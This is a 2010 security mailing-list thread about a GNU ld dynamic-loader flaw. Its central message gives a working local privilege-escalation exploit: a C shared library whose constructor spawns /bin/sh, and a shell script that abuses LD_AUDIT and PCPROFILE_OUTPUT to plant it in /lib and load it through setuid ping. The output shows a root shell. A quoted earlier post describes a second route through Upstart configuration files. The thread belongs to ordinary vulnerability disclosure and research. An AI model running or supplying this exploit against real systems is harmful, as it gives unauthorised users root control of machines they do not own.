Re: Privilege scalation with GNU ld dlopen

[Xavier Garcia <xavi.garcia () gmail com>]

Hi,

One should be safe because users need admin rights to write
there, but playing with setuid binaries is always dangerous.

This could be enforced by implementing a 'secure level' in the
kernel, but then the maintenance of the system could be a
nightmare. Imagine having to reboot a critical server just
because the 'secure level' must be desabled in order to
install patches :)

Regards,

Xavier Garcia

On Tue, Nov 09, 2010 at 09:57:37AM -0500, Nicholas B. wrote:
> One would hope a system didn't allow just anyone to write to /lib/
>
> On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <xavi.garcia () gmail com> wrote:
>
> > Hi guys,
> >
> >
> > I finally found an easier way to gain root privileges, without
> > rebooting the computer.
> >
> >
> > The vulnerability can be used to upload a custom library to the
> > server and then execute a root shell.
> >
> > The library is really simple (libevil.so)
> >
> > ----
> >
> > #include <errno.h>
> > #include <unistd.h>
> >
> > static void
> > __attribute__ ((constructor))
> > install (void)
> > {
> >  execl("/bin/sh", "/bin/sh", (char *) 0);
> > }
> >
> > ----
> >
> > user@host:~/$ cat ./run.sh
> >
> > umask 0
> > gcc -c -fPIC evil.c -o evil.o
> > gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
> > LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so"
> > ping
> > cat ./libevil.so > /lib/libevil.so
> > LD_AUDIT="libevil.so" ping
> >
> >
> > user@host:~/$ sh run.sh
> > ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit
> > interface: undefined symbol: la_version; ignored.
> > Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w
> > deadline]
> >            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
> >            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
> >            [-T tstamp-options] [-Q tos] [hop1 ...] destination
> > # whoami
> > root
> > #
> >
> >
> > I hope it is helpful.
> >
> > Regards,
> >
> > Xavier Garcia
> >
> >
> >
> >
> > On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> > > Hi guys,
> > >
> > > I am trying to find some ways to gain root access by using the
> > > vulnerability described in the advisory
> > >
> > > http://marc.info/?l=full-disclosure&m=128776663124692&w=2
> > >
> > > published by Tavis Ormandy.
> > >
> > > The advisory states that Cron can be used to scalate privileges,
> > > but Cron does not accept files that are writable by the group or
> > > others, returning the error BAD FILE MODE.
> > >
> > > I have been looking for alternative ways to gain root access, but
> > > there are not many places where it is possible.
> > >
> > > I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> > > does not check the permissions and happily reads the
> > > configuration files every time it restarts. This means that we can
> > > create a configuration file that will instruct Upstart to
> > > drop a root shell :)
> > >
> > >
> > > The down side is that we have to be patient and wait until the
> > > computer is rebooted, or use some social engineering.
> > >
> > >
> > > You can find more details at
> > http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
> > > I hope this finding is interesting or usefull for the list.
> > >
> > > Regards,
> > >
> > > Xavier Garcia
> > _______________________________________________
> > Pauldotcom mailing list
> > Pauldotcom () mail pauldotcom com
> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > Main Web Site: http://pauldotcom.com

> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom () mail pauldotcom com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com